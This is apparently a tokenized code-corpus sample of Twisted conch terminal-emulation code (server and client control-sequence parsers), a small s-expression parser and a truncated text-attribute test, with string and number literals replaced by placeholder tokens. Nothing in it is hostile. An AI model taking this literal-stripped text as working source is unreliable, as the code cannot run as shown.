<EOL> class Vector : <EOL> def __init__ ( self , x , y ) : <EOL> self . x = x <EOL> self . y = y <EOL> def log ( s ) : <EOL> file ( '<STR_LIT>' , '<STR_LIT:a>' ) . write ( str ( s ) + '<STR_LIT:\n>' ) <EOL> _KEY_NAMES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class _const ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT:[>' + self . name + '<STR_LIT:]>' <EOL> FUNCTION_KEYS = [ <EOL> _const ( _name ) for _name in _KEY_NAMES ] <EOL> class ServerProtocol ( protocol . Protocol ) : <EOL> implements ( ITerminalTransport ) <EOL> protocolFactory = None <EOL> terminalProtocol = None <EOL> TAB = '<STR_LIT:\t>' <EOL> BACKSPACE = '<STR_LIT>' <EOL> lastWrite = '<STR_LIT>' <EOL> state = '<STR_LIT:data>' <EOL> termSize = Vector ( <NUM_LIT> , <NUM_LIT> ) <EOL> cursorPos = Vector ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> scrollRegion = None <EOL> factory = None <EOL> def __init__ ( self , protocolFactory = None , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if protocolFactory is not None : <EOL> self . protocolFactory = protocolFactory <EOL> self . protocolArgs = a <EOL> self . protocolKwArgs = kw <EOL> self . _cursorReports = [ ] <EOL> def connectionMade ( self ) : <EOL> if self . protocolFactory is not None : <EOL> self . terminalProtocol = self . protocolFactory ( * self . protocolArgs , ** self . protocolKwArgs ) <EOL> try : <EOL> factory = self . factory <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . terminalProtocol . factory = factory <EOL> self . terminalProtocol . makeConnection ( self ) <EOL> def dataReceived ( self , data ) : <EOL> for ch in data : <EOL> if self . state == '<STR_LIT:data>' : <EOL> if ch == '<STR_LIT>' : <EOL> self . state = '<STR_LIT>' <EOL> else : <EOL> self . terminalProtocol . keystrokeReceived ( ch , None ) <EOL> elif self . state == '<STR_LIT>' : <EOL> if ch == '<STR_LIT:[>' : <EOL> self . state = '<STR_LIT>' <EOL> self . escBuf = [ ] <EOL> elif ch == '<STR_LIT:O>' : <EOL> self . state = '<STR_LIT>' <EOL> else : <EOL> self . state = '<STR_LIT:data>' <EOL> self . _handleShortControlSequence ( ch ) <EOL> elif self . state == '<STR_LIT>' : <EOL> if ch == '<STR_LIT:O>' : <EOL> self . state = '<STR_LIT>' <EOL> elif ch . isalpha ( ) or ch == '<STR_LIT>' : <EOL> self . _handleControlSequence ( '<STR_LIT>' . join ( self . escBuf ) + ch ) <EOL> del self . escBuf <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> self . escBuf . append ( ch ) <EOL> elif self . state == '<STR_LIT>' : <EOL> self . _handleLowFunctionControlSequence ( ch ) <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _handleShortControlSequence ( self , ch ) : <EOL> self . terminalProtocol . keystrokeReceived ( ch , self . ALT ) <EOL> def _handleControlSequence ( self , buf ) : <EOL> buf = '<STR_LIT>' + buf <EOL> f = getattr ( self . controlSequenceParser , CST . get ( buf [ - <NUM_LIT:1> ] , buf [ - <NUM_LIT:1> ] ) , None ) <EOL> if f is None : <EOL> self . unhandledControlSequence ( buf ) <EOL> else : <EOL> f ( self , self . terminalProtocol , buf [ : - <NUM_LIT:1> ] ) <EOL> def unhandledControlSequence ( self , buf ) : <EOL> self . terminalProtocol . unhandledControlSequence ( buf ) <EOL> def _handleLowFunctionControlSequence ( self , ch ) : <EOL> map = { '<STR_LIT:P>' : self . F1 , '<STR_LIT>' : self . F2 , '<STR_LIT:R>' : self . F3 , '<STR_LIT:S>' : self . F4 } <EOL> keyID = map . get ( ch ) <EOL> if keyID is not None : <EOL> self . terminalProtocol . keystrokeReceived ( keyID , None ) <EOL> else : <EOL> self . terminalProtocol . unhandledControlSequence ( '<STR_LIT>' + ch ) <EOL> class ControlSequenceParser : <EOL> def A ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . UP_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:A>' ) <EOL> def B ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . DOWN_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:B>' ) <EOL> def C ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . RIGHT_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:C>' ) <EOL> def D ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . LEFT_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:D>' ) <EOL> def E ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . NUMPAD_MIDDLE , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:E>' ) <EOL> def F ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . END , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:F>' ) <EOL> def H ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . HOME , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:H>' ) <EOL> def R ( self , proto , handler , buf ) : <EOL> if not proto . _cursorReports : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> elif buf . startswith ( '<STR_LIT>' ) : <EOL> report = buf [ <NUM_LIT:2> : ] <EOL> parts = report . split ( '<STR_LIT:;>' ) <EOL> if len ( parts ) != <NUM_LIT:2> : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> else : <EOL> Pl , Pc = parts <EOL> try : <EOL> Pl , Pc = int ( Pl ) , int ( Pc ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> else : <EOL> d = proto . _cursorReports . pop ( <NUM_LIT:0> ) <EOL> d . callback ( ( Pc - <NUM_LIT:1> , Pl - <NUM_LIT:1> ) ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> def Z ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . TAB , proto . SHIFT ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> def tilde ( self , proto , handler , buf ) : <EOL> map = { <NUM_LIT:1> : proto . HOME , <NUM_LIT:2> : proto . INSERT , <NUM_LIT:3> : proto . DELETE , <EOL> <NUM_LIT:4> : proto . END , <NUM_LIT:5> : proto . PGUP , <NUM_LIT:6> : proto . PGDN , <EOL> <NUM_LIT:15> : proto . F5 , <NUM_LIT> : proto . F6 , <NUM_LIT> : proto . F7 , <EOL> <NUM_LIT> : proto . F8 , <NUM_LIT:20> : proto . F9 , <NUM_LIT> : proto . F10 , <EOL> <NUM_LIT> : proto . F11 , <NUM_LIT> : proto . F12 } <EOL> if buf . startswith ( '<STR_LIT>' ) : <EOL> ch = buf [ <NUM_LIT:2> : ] <EOL> try : <EOL> v = int ( ch ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> else : <EOL> symbolic = map . get ( v ) <EOL> if symbolic is not None : <EOL> handler . keystrokeReceived ( map [ v ] , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> controlSequenceParser = ControlSequenceParser ( ) <EOL> def cursorUp ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . y = max ( self . cursorPos . y - n , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorDown ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . y = min ( self . cursorPos . y + n , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorForward ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . x = min ( self . cursorPos . x + n , self . termSize . x - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorBackward ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . x = max ( self . cursorPos . x - n , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorPosition ( self , column , line ) : <EOL> self . write ( '<STR_LIT>' % ( line + <NUM_LIT:1> , column + <NUM_LIT:1> ) ) <EOL> def cursorHome ( self ) : <EOL> self . cursorPos . x = self . cursorPos . y = <NUM_LIT:0> <EOL> self . write ( '<STR_LIT>' ) <EOL> def index ( self ) : <EOL> self . cursorPos . y = min ( self . cursorPos . y + <NUM_LIT:1> , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def reverseIndex ( self ) : <EOL> self . cursorPos . y = max ( self . cursorPos . y - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def nextLine ( self ) : <EOL> self . cursorPos . x = <NUM_LIT:0> <EOL> self . cursorPos . y = min ( self . cursorPos . y + <NUM_LIT:1> , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT:\n>' ) <EOL> def saveCursor ( self ) : <EOL> self . _savedCursorPos = Vector ( self . cursorPos . x , self . cursorPos . y ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def restoreCursor ( self ) : <EOL> self . cursorPos = self . _savedCursorPos <EOL> del self . _savedCursorPos <EOL> self . write ( '<STR_LIT>' ) <EOL> def setModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def setPrivateModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def resetModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def resetPrivateModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def applicationKeypadMode ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def numericKeypadMode ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def selectCharacterSet ( self , charSet , which ) : <EOL> if which == G0 : <EOL> which = '<STR_LIT:(>' <EOL> elif which == G1 : <EOL> which = '<STR_LIT:)>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if charSet == CS_UK : <EOL> charSet = '<STR_LIT:A>' <EOL> elif charSet == CS_US : <EOL> charSet = '<STR_LIT:B>' <EOL> elif charSet == CS_DRAWING : <EOL> charSet = '<STR_LIT:0>' <EOL> elif charSet == CS_ALTERNATE : <EOL> charSet = '<STR_LIT:1>' <EOL> elif charSet == CS_ALTERNATE_SPECIAL : <EOL> charSet = '<STR_LIT:2>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . write ( '<STR_LIT>' + which + charSet ) <EOL> def shiftIn ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def shiftOut ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def singleShift2 ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def singleShift3 ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def selectGraphicRendition ( self , * attributes ) : <EOL> attrs = [ ] <EOL> for a in attributes : <EOL> attrs . append ( a ) <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( attrs ) , ) ) <EOL> def horizontalTabulationSet ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def tabulationClear ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def tabulationClearAll ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def doubleHeightLine ( self , top = True ) : <EOL> if top : <EOL> self . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . write ( '<STR_LIT>' ) <EOL> def singleWidthLine ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def doubleWidthLine ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToLineEnd ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToLineBeginning ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseLine ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToDisplayEnd ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseToDisplayBeginning ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def eraseDisplay ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def deleteCharacter ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def insertLine ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def deleteLine ( self , n = <NUM_LIT:1> ) : <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def setScrollRegion ( self , first = None , last = None ) : <EOL> if first is not None : <EOL> first = '<STR_LIT>' % ( first , ) <EOL> else : <EOL> first = '<STR_LIT>' <EOL> if last is not None : <EOL> last = '<STR_LIT>' % ( last , ) <EOL> else : <EOL> last = '<STR_LIT>' <EOL> self . write ( '<STR_LIT>' % ( first , last ) ) <EOL> def resetScrollRegion ( self ) : <EOL> self . setScrollRegion ( ) <EOL> def reportCursorPosition ( self ) : <EOL> d = defer . Deferred ( ) <EOL> self . _cursorReports . append ( d ) <EOL> self . write ( '<STR_LIT>' ) <EOL> return d <EOL> def reset ( self ) : <EOL> self . cursorPos . x = self . cursorPos . y = <NUM_LIT:0> <EOL> try : <EOL> del self . _savedCursorPos <EOL> except AttributeError : <EOL> pass <EOL> self . write ( '<STR_LIT>' ) <EOL> def write ( self , bytes ) : <EOL> if bytes : <EOL> self . lastWrite = bytes <EOL> self . transport . write ( '<STR_LIT:\r\n>' . join ( bytes . split ( '<STR_LIT:\n>' ) ) ) <EOL> def writeSequence ( self , bytes ) : <EOL> self . write ( '<STR_LIT>' . join ( bytes ) ) <EOL> def loseConnection ( self ) : <EOL> self . reset ( ) <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . terminalProtocol is not None : <EOL> try : <EOL> self . terminalProtocol . connectionLost ( reason ) <EOL> finally : <EOL> self . terminalProtocol = None <EOL> for name , const in zip ( _KEY_NAMES , FUNCTION_KEYS ) : <EOL> setattr ( ServerProtocol , name , const ) <EOL> class ClientProtocol ( protocol . Protocol ) : <EOL> terminalFactory = None <EOL> terminal = None <EOL> state = '<STR_LIT:data>' <EOL> _escBuf = None <EOL> _shorts = { <EOL> '<STR_LIT:D>' : '<STR_LIT:index>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:=>' : '<STR_LIT>' , <EOL> '<STR_LIT:>>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT:O>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' } <EOL> _longs = { <EOL> '<STR_LIT:[>' : '<STR_LIT>' , <EOL> '<STR_LIT:(>' : '<STR_LIT>' , <EOL> '<STR_LIT:)>' : '<STR_LIT>' , <EOL> '<STR_LIT:#>' : '<STR_LIT>' } <EOL> _charsets = { <EOL> '<STR_LIT:A>' : CS_UK , <EOL> '<STR_LIT:B>' : CS_US , <EOL> '<STR_LIT:0>' : CS_DRAWING , <EOL> '<STR_LIT:1>' : CS_ALTERNATE , <EOL> '<STR_LIT:2>' : CS_ALTERNATE_SPECIAL } <EOL> factory = None <EOL> def __init__ ( self , terminalFactory = None , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if terminalFactory is not None : <EOL> self . terminalFactory = terminalFactory <EOL> self . terminalArgs = a <EOL> self . terminalKwArgs = kw <EOL> def connectionMade ( self ) : <EOL> if self . terminalFactory is not None : <EOL> self . terminal = self . terminalFactory ( * self . terminalArgs , ** self . terminalKwArgs ) <EOL> self . terminal . factory = self . factory <EOL> self . terminal . makeConnection ( self ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . terminal is not None : <EOL> try : <EOL> self . terminal . connectionLost ( reason ) <EOL> finally : <EOL> del self . terminal <EOL> def dataReceived ( self , bytes ) : <EOL> """<STR_LIT>""" <EOL> toWrite = [ ] <EOL> for b in bytes : <EOL> if self . state == '<STR_LIT:data>' : <EOL> if b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . state = '<STR_LIT>' <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . shiftOut ( ) <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . shiftIn ( ) <EOL> elif b == '<STR_LIT>' : <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> del toWrite [ : ] <EOL> self . terminal . cursorBackward ( ) <EOL> else : <EOL> toWrite . append ( b ) <EOL> elif self . state == '<STR_LIT>' : <EOL> fName = self . _shorts . get ( b ) <EOL> if fName is not None : <EOL> self . state = '<STR_LIT:data>' <EOL> getattr ( self . terminal , fName ) ( ) <EOL> else : <EOL> state = self . _longs . get ( b ) <EOL> if state is not None : <EOL> self . state = state <EOL> else : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + b ) <EOL> self . state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> if self . _escBuf is None : <EOL> self . _escBuf = [ ] <EOL> if b . isalpha ( ) or b == '<STR_LIT>' : <EOL> self . _handleControlSequence ( '<STR_LIT>' . join ( self . _escBuf ) , b ) <EOL> del self . _escBuf <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> self . _escBuf . append ( b ) <EOL> elif self . state == '<STR_LIT>' : <EOL> self . terminal . selectCharacterSet ( self . _charsets . get ( b , b ) , G0 ) <EOL> self . state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> self . terminal . selectCharacterSet ( self . _charsets . get ( b , b ) , G1 ) <EOL> self . state = '<STR_LIT:data>' <EOL> elif self . state == '<STR_LIT>' : <EOL> self . _handleHeightWidth ( b ) <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if toWrite : <EOL> self . terminal . write ( '<STR_LIT>' . join ( toWrite ) ) <EOL> def _handleControlSequence ( self , buf , terminal ) : <EOL> f = getattr ( self . controlSequenceParser , CST . get ( terminal , terminal ) , None ) <EOL> if f is None : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + buf + terminal ) <EOL> else : <EOL> f ( self , self . terminal , buf ) <EOL> class ControlSequenceParser : <EOL> def _makeSimple ( ch , fName ) : <EOL> n = '<STR_LIT>' + fName <EOL> def simple ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> getattr ( handler , n ) ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> m = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + ch ) <EOL> else : <EOL> getattr ( handler , n ) ( m ) <EOL> return simple <EOL> for ( ch , fName ) in ( ( '<STR_LIT:A>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:C>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) ) : <EOL> exec ch + "<STR_LIT>" <EOL> del _makeSimple <EOL> def h ( self , proto , handler , buf ) : <EOL> try : <EOL> modes = map ( int , buf . split ( '<STR_LIT:;>' ) ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:h>' ) <EOL> else : <EOL> handler . setModes ( modes ) <EOL> def l ( self , proto , handler , buf ) : <EOL> try : <EOL> modes = map ( int , buf . split ( '<STR_LIT:;>' ) ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:l>' ) <EOL> else : <EOL> handler . resetModes ( modes ) <EOL> def r ( self , proto , handler , buf ) : <EOL> parts = buf . split ( '<STR_LIT:;>' ) <EOL> if len ( parts ) == <NUM_LIT:1> : <EOL> handler . setScrollRegion ( None , None ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> try : <EOL> if parts [ <NUM_LIT:0> ] : <EOL> pt = int ( parts [ <NUM_LIT:0> ] ) <EOL> else : <EOL> pt = None <EOL> if parts [ <NUM_LIT:1> ] : <EOL> pb = int ( parts [ <NUM_LIT:1> ] ) <EOL> else : <EOL> pb = None <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:r>' ) <EOL> else : <EOL> handler . setScrollRegion ( pt , pb ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:r>' ) <EOL> def K ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . eraseToLineEnd ( ) <EOL> elif buf == '<STR_LIT:1>' : <EOL> handler . eraseToLineBeginning ( ) <EOL> elif buf == '<STR_LIT:2>' : <EOL> handler . eraseLine ( ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT>' ) <EOL> def H ( self , proto , handler , buf ) : <EOL> handler . cursorHome ( ) <EOL> def J ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . eraseToDisplayEnd ( ) <EOL> elif buf == '<STR_LIT:1>' : <EOL> handler . eraseToDisplayBeginning ( ) <EOL> elif buf == '<STR_LIT:2>' : <EOL> handler . eraseDisplay ( ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT>' ) <EOL> def P ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . deleteCharacter ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:P>' ) <EOL> else : <EOL> handler . deleteCharacter ( n ) <EOL> def L ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . insertLine ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:L>' ) <EOL> else : <EOL> handler . insertLine ( n ) <EOL> def M ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . deleteLine ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> n = int ( buf ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:M>' ) <EOL> else : <EOL> handler . deleteLine ( n ) <EOL> def n ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> x , y = handler . reportCursorPosition ( ) <EOL> proto . transport . write ( '<STR_LIT>' % ( x + <NUM_LIT:1> , y + <NUM_LIT:1> ) ) <EOL> else : <EOL> handler . unhandledControlSequence ( '<STR_LIT>' + buf + '<STR_LIT:n>' ) <EOL> def m ( self , proto , handler , buf ) : <EOL> if not buf : <EOL> handler . selectGraphicRendition ( NORMAL ) <EOL> else : <EOL> attrs = [ ] <EOL> for a in buf . split ( '<STR_LIT:;>' ) : <EOL> try : <EOL> a = int ( a ) <EOL> except ValueError : <EOL> pass <EOL> attrs . append ( a ) <EOL> handler . selectGraphicRendition ( * attrs ) <EOL> controlSequenceParser = ControlSequenceParser ( ) <EOL> def _handleHeightWidth ( self , b ) : <EOL> if b == '<STR_LIT:3>' : <EOL> self . terminal . doubleHeightLine ( True ) <EOL> elif b == '<STR_LIT:4>' : <EOL> self . terminal . doubleHeightLine ( False ) <EOL> elif b == '<STR_LIT:5>' : <EOL> self . terminal . singleWidthLine ( ) <EOL> elif b == '<STR_LIT>' : <EOL> self . terminal . doubleWidthLine ( ) <EOL> else : <EOL> self . terminal . unhandledControlSequence ( '<STR_LIT>' + b ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> def parse ( s ) : <EOL> s = s . strip ( ) <EOL> expr = [ ] <EOL> while s : <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:(>' : <EOL> newSexp = [ ] <EOL> if expr : <EOL> expr [ - <NUM_LIT:1> ] . append ( newSexp ) <EOL> expr . append ( newSexp ) <EOL> s = s [ <NUM_LIT:1> : ] <EOL> continue <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:)>' : <EOL> aList = expr . pop ( ) <EOL> s = s [ <NUM_LIT:1> : ] <EOL> if not expr : <EOL> assert not s <EOL> return aList <EOL> continue <EOL> i = <NUM_LIT:0> <EOL> while s [ i ] . isdigit ( ) : i += <NUM_LIT:1> <EOL> assert i <EOL> length = int ( s [ : i ] ) <EOL> data = s [ i + <NUM_LIT:1> : i + <NUM_LIT:1> + length ] <EOL> expr [ - <NUM_LIT:1> ] . append ( data ) <EOL> s = s [ i + <NUM_LIT:1> + length : ] <EOL> assert <NUM_LIT:0> , "<STR_LIT>" <EOL> def pack ( sexp ) : <EOL> s = "<STR_LIT>" <EOL> for o in sexp : <EOL> if type ( o ) in ( type ( ( ) ) , type ( [ ] ) ) : <EOL> s += '<STR_LIT:(>' <EOL> s += pack ( o ) <EOL> s += '<STR_LIT:)>' <EOL> else : <EOL> s += '<STR_LIT>' % ( len ( o ) , o ) <EOL> return s </s>
<s> from twisted . trial import unittest <EOL> from twisted . conch . insults import helper , text <EOL> A = text . attributes <EOL> class Serialization ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . attrs = helper . CharacterAttribute ( ) <EOL> def testTrivial ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . normal [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBold ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . bold [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testUnderline ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . underline [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBlink ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . blink [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testReverseVideo ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . reverseVideo [ '<STR_LIT>' ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testMinus ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . bold [ A . blink [ '<STR_LIT>' , - A . bold [ '<STR_LIT>' ] , '<STR_LIT:.>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testForeground ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . normal [ A . fg . red [ '<STR_LIT>' ] , A . fg . green [ '<STR_LIT>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> def testBackground ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . normal [ A . bg . red [ '<STR_LIT>' ] , A . bg . green [ '<STR_LIT>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' 